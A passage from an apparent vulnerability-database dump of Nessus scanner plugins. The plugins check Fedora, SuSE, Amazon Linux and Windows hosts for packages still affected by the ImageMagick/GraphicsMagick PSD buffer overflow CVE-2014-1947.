release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"GraphicsMagick-1.3.20-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:22:49", "bulletinFamily": "scanner", "description": "Fix for psd security issue, and upgrade path to f21.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-14617.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79260", "published": "2014-11-17T00:00:00", "title": "Fedora 21 : GraphicsMagick-1.3.20-3.fc21 (2014-14617)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14617.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79260);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:21\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-14617\");\n\n script_name(english:\"Fedora 21 : GraphicsMagick-1.3.20-3.fc21 (2014-14617)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for psd security issue, and upgrade path to f21.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143680.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d41032df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"GraphicsMagick-1.3.20-3.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:22:23", "bulletinFamily": "scanner", "description": "Better fix for psd security issue, CVE-2014-1947.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-9927.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77593", "published": "2014-09-10T00:00:00", "title": "Fedora 20 : GraphicsMagick-1.3.20-3.fc20 (2014-9927)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9927.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77593);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9927\");\n\n script_name(english:\"Fedora 20 : GraphicsMagick-1.3.20-3.fc20 (2014-9927)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Better fix for psd security issue, CVE-2014-1947.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137362.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7c681a81\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"GraphicsMagick-1.3.20-3.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:20:51", "bulletinFamily": "scanner", "description": "The remote Windows host is running a version of ImageMagick prior to version 6.8.7-6. It is, therefore, affected by a memory corruption vulnerability related to PSD image file handling and the 'WritePSDImage' function. Exploitation of this issue could result in a denial of service or arbitrary code execution.", "modified": "2018-07-12T00:00:00", "id": "IMAGEMAGICK_6_8_7_6.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72721", "published": "2014-02-27T00:00:00", "title": "ImageMagick < 6.8.7-6 WritePSDImage PSD Handling Memory Corruption", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72721);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/12 19:01:17\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n\n script_name(english:\"ImageMagick < 6.8.7-6 WritePSDImage PSD Handling Memory Corruption\");\n script_summary(english:\"Checks the version of ImageMagick\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by a\nmemory corruption vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of ImageMagick prior to\nversion 6.8.7-6. It is, therefore, affected by a memory corruption\nvulnerability related to PSD image file handling and the 'WritePSDImage'\nfunction. Exploitation of this issue could result in a denial of\nservice or arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.imagemagick.org/script/changelog.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ImageMagick 6.8.7-6 or later.\n\nNote that you may need to manually uninstall the vulnerable version\nfrom the system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:imagemagick:imagemagick\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"imagemagick_installed.nasl\");\n script_require_keys(\"installed_sw/ImageMagick\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ImageMagick\";\nfix = \"6.8.7\";\nfix_build = 6;\n\n# Get installs\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\ndisplay_version = install['display_version'];\nversion = install['version'];\nbuild = install['build'];\npath = install['path'];\n\nvuln = FALSE;\n\ndisplay_fix = fix + \"-\" + fix_build;\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;\n\nif ((ver_compare(ver:version, fix:fix, strict:FALSE) == 0) &&\n build < fix_build\n )\n vuln = TRUE;\n\nif (vuln)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n items = make_array(\"Installed version\", display_version,\n \"Fixed version\", display_fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n exit(0);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:20:54", "bulletinFamily": "scanner", "description": "The image converter program and library set of ImageMagick received an update that fixes a buffer overflow when handling PSD images.", "modified": "2014-03-13T00:00:00", "id": "SUSE_11_IMAGEMAGICK-140307.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72977", "published": "2014-03-13T00:00:00", "title": "SuSE 11.3 Security Update : ImageMagick (SAT Patch Number 8978)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72977);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/03/13 10:47:41 $\");\n\n script_cve_id(\"CVE-2014-1947\");\n\n script_name(english:\"SuSE 11.3 Security Update : ImageMagick (SAT Patch Number 8978)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The image converter program and library set of ImageMagick received an\nupdate that fixes a buffer overflow when handling PSD images.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=863838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-1947.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 8978.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libMagick++1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libMagickCore1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libMagickWand1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"ImageMagick-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libMagick++1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libMagickCore1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libMagickWand1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"ImageMagick-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libMagick++1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libMagickCore1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libMagickWand1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libMagickCore1-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:22:32", "bulletinFamily": "scanner", "description": "A buffer overflow flaw affecting ImageMagick and GraphicsMagic when handling PSD images was reported.", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2014-420.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78363", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2014-420)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-420.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78363);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_xref(name:\"ALAS\", value:\"2014-420\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2014-420)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw affecting ImageMagick and GraphicsMagic when\nhandling PSD images was reported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-420.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.20-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.20-3.5.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:21:03", "bulletinFamily": "scanner", "description": "- Build 6.8.6-3 version because soname bump happened in newer.\n\n - Concretize soname versioning.\n\n - Add Patch0: ImageMagick-6.8.7-psd-CVE.patch CVE bug fix backporting:\n http://www.imagemagick.org/discourse-server/viewtopic.\n php?f=3&t=25128&sid=ff40ad66b1f845c767aa77c7e32f9f9c&p =109901#p109901 for fix CVE-2014-1958 (bz#1067276, bz#1067277, bz#1067278), CVE-2014-1947, CVE-2014-2030 (bz#1064098)\n\n - Enable %check by Alexander Todorov suggestion - bz#1076671.\n\n - Add %{?_smp_mflags} into make install and check (not main compilation).\n\n - Porting some other non-destructive minor enhancements from master branch: o Drop BR giflib-devel (bz#1039378) o Use %__isa_bits instead of hardcoding the list of 64-bit architectures.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-4969.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73546", "published": "2014-04-16T00:00:00", "title": "Fedora 20 : ImageMagick-6.8.6.3-4.fc20 (2014-4969)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4969.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73546);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:18 $\");\n\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\");\n script_bugtraq_id(65563, 65683);\n script_xref(name:\"FEDORA\", value:\"2014-4969\");\n\n script_name(english:\"Fedora 20 : ImageMagick-6.8.6.3-4.fc20 (2014-4969)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Build 6.8.6-3 version because soname bump happened in\n newer.\n\n - Concretize soname versioning.\n\n - Add Patch0: ImageMagick-6.8.7-psd-CVE.patch CVE bug\n fix backporting:\n http://www.imagemagick.org/discourse-server/viewtopic.\n php?f=3&t=25128&sid=ff40ad66b1f845c767aa77c7e32f9f9c&p\n =109901#p109901 for fix CVE-2014-1958 (bz#1067276,\n bz#1067277, bz#1067278), CVE-2014-1947, CVE-2014-2030\n (bz#1064098)\n\n - Enable %check by Alexander Todorov suggestion -\n bz#1076671.\n\n - Add %{?_smp_mflags} into make install and check (not\n main compilation).\n\n - Porting some other non-destructive minor enhancements\n from master branch: o Drop BR giflib-devel\n (bz#1039378) o Use %__isa_bits instead of hardcoding\n the list of 64-bit architectures.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.imagemagick.org/discourse-server/viewtopic.php?f=3&t=25128&sid=ff40ad66b1f845c767aa77c7e32f9f9c&p=109901#p109901\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?54b11eaa\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1067276\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131475.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a099e222\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n 